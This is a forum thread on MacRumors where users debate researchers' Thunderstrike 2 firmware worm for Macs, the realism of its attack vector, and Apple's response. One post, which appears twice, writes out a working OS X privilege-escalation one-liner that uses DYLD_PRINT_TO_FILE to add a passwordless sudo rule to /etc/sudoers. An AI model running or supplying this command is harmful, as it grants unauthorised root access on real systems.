you mean this exploit is going to make you buy MORE Apple hardware? Apple will fix this in a New York minute! 
Got a tip for us?
Let us know
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.
First Firmware Worm Able to Infect Macs Created by Researchers
- Thread starter MacRumors
- Start date
- Sort by reaction score
Whoever wanted to download that and open a terminal? The user is the main problem here. Enough said.
Is there a list of Macs known to be susceptible to this, or is it all of them? I was looking at (eventually) getting a new iMac, but now not so sure.
And before any fanboys share their "0.2" - I take security very seriously, and while I love Apple, I'm not going to invest in such an expensive machine with doors like this wide open.
And before any fanboys share their "0.2" - I take security very seriously, and while I love Apple, I'm not going to invest in such an expensive machine with doors like this wide open.
Just to translate to plain english:
"Thunderstrike 2, unlike the first demonstration of Thunderstrike, is able to infect a Mac remotely through a malicious website or email."
Translation:
"You receive a link via email or web sites, download the malicious firmware, install it as root after entering administrator password"
It's not something that happens alone. It's like complaining someone robbed your house and it turns out you gave them the keys.
"Thunderstrike 2, unlike the first demonstration of Thunderstrike, is able to infect a Mac remotely through a malicious website or email."
Translation:
"You receive a link via email or web sites, download the malicious firmware, install it as root after entering administrator password"
It's not something that happens alone. It's like complaining someone robbed your house and it turns out you gave them the keys.
Agreed. However the way I see it, this is a double-edged sword. On the one hand these 'researchers' help Apple and the Mac community-at-large by pointing out vulnerabilities that can then be addressed, but they also highlight these weak spots to those malicious hackers that are ready to pounce during that limited window of opportunity, before patches are in place.
Apple for obvious reasons has seemed to be taking their time to respond to these various exploits. Most often these legitimate researchers contact Apple first, before publicly releasing their findings to give Apple time to address the problem, before the vulnerability is exposed for all to read.
What obvious reasons? - I think it's pertinent to fix this ASAP. Any lallygagging around is pretty inexcusable. Apple responding to these threats as quick as possible can only lead to good things, or am I missing something?
Man, seriously this is too much. You're obsessed with Tim Cook like a churchman obsessed with heresy during the Inquisition.
I think the keyword here is "firmware". Just like the original Thunderstrike, it involves plugging in a rogue Thunderbolt cable or accessory. That's the freaking attack vector. So... if you don't plug anything that you don't trust, then you can't be compromised. Sure if you are willy-nilly plugging in an infected thunderbolt cable to multiple computers, it can infect them, yada yada... but the issue here is it has to start with infected hardware which a) doesn't exist in the wild b) would replicate very slowly.
Just saying... not dooms day stuff here... and Apple will fix it in less than a month.
Just saying... not dooms day stuff here... and Apple will fix it in less than a month.
Apple is so screwy that that don't know the meaning of security. It's ironic that cook and his friends believe security and privacy and yet are vulnerable to worm attack. Stop focusing on jailbreak and focus on overall security. People, don't forget what snow leopard..
Other than the firmware hack, they are also using this exploit to execute sudo without password:
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3'| DYLD_PRINT_TO_FILE=/etc/sudoers newgrp
Details: https://www.sektioneins.de/blog/15-07-07-dyld_print_to_file_lpe.html
Come on APPLE, too many dangerous bugs in the field!
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3'| DYLD_PRINT_TO_FILE=/etc/sudoers newgrp
Details: https://www.sektioneins.de/blog/15-07-07-dyld_print_to_file_lpe.html
Come on APPLE, too many dangerous bugs in the field!
Last edited:
From various report, technology articles, and from this one. Many of them says mac OS X is somewhat more vulnerable than windows, because apple release fixes slowly.
I hear what you're saying, they have a responsibility to act on this asap.
There is however a fine line between (A) immediately publicly acknowledging the problem and by such recognition focussing even more attention to the problem, and perhaps creating fear and uncertainty in the Mac community (while they are perhaps still struggling to determine the scope of the problem and while they are still in the process of developing a working and foolproof patch), and (B) quietly and diligently working to create a permanent solution to solve the exploit, as you can bet your bottom dollar they are.
There were some issues with the way that data was represented, read your own linked ZDNet article for more info.
Access to system folders does require a password.
---
It's a good thing I don't use/have Thunderbolt then
There's nothing incorrect about this grammar. It's just technically ambiguous.
Maybe, maybe not. A guy walks up to a convenience charging station in the gate area at ATL. His MacBook (with one, universal port) is pre-infected (intentionally?) with this malware. It transfers to the Thunderbolt/USB-C at the charging station. Now every subsequent user of that charging station will be infected. The same could happen at libraries, A/V presentation situations ("oh you forgot your cable, here borrow this one..."), etc.
The only real fix is to trash all existing Thunderbolt peripherals and cables and replace them with updated, more secure versions. How likely is that?
We all know how rubbish everyone is when it comes to security. XD
Seriously, there have been major breaches everywhere recently. Most of the Unix world fell victim to the Bash bug and those OpenSSL messes. Perhaps the only way Apple did worse was by not having an "apt-get" command in OS X to install individual patches. Ironically, the only big platform for which there hasn't been a egregious vulnerability exposed has been Microsoft Windows, but maybe it's because it's no longer news at this point if it happens.
I never used to suspect that the government was planting vulnerabilities, but there have been some ridiculous breaches discovered...
Also all the Flash and Java vulnerabilities, but they're usually discovered before too many have fallen victim, so I never worry.
It's not exactly a Trojan, and it won't be blocked by Gatekeeper, since it's an attack in the hardware/firmware level.
Malicious firmware can only infect you machine during booting procedure, that is, even before the OS is loaded. You need to reboot your machine from infected storage device (such as an USB stick), so that the firmware can only be reprogrammed.
It's possible to spread the malicious codes through network connection, but the codes must be applied to a bootable media, before it become infectious. And of course, the attackers will need breach the victim system, pass Gatekeeper check, gain root access, before they can finally apply the codes to some media. But that's off-topic issues, for those researchers.
In short: the researchers "assumed" your system is already breached, AND the malicious codes is already applied to a bootable media, AND, for some mysterious reason, you choose to reboot from the infected media, so that your machine can finally get infected. Piece of cake, isn't it ?
However, you may still want to keep an eye on it. While normal users won't need to worry about it too much, you're still altered if you're an IT manager of schools or labs. The machines under your management could possibly being attacked, if the users are allowed to contact with the machines physically. Attackers could simply plug a USB stick, reboot, and BOOM! You're breached.
Well that's the whole story, sort of.
Good observation. Not only that, but Windows XP was left out that accounts for roughly 20%. No Android listed?!? Considering they mentioned iOS.
lol hey at least they are being honest.
What if every Mac is already infected with malware.
What if every Mac for the last decade has slowing and inconspicuously been infected by sleeper malware.
What if one day they all awake to become a massive super computer, everywhere and nowhere…
Transcendence.
Last edited:
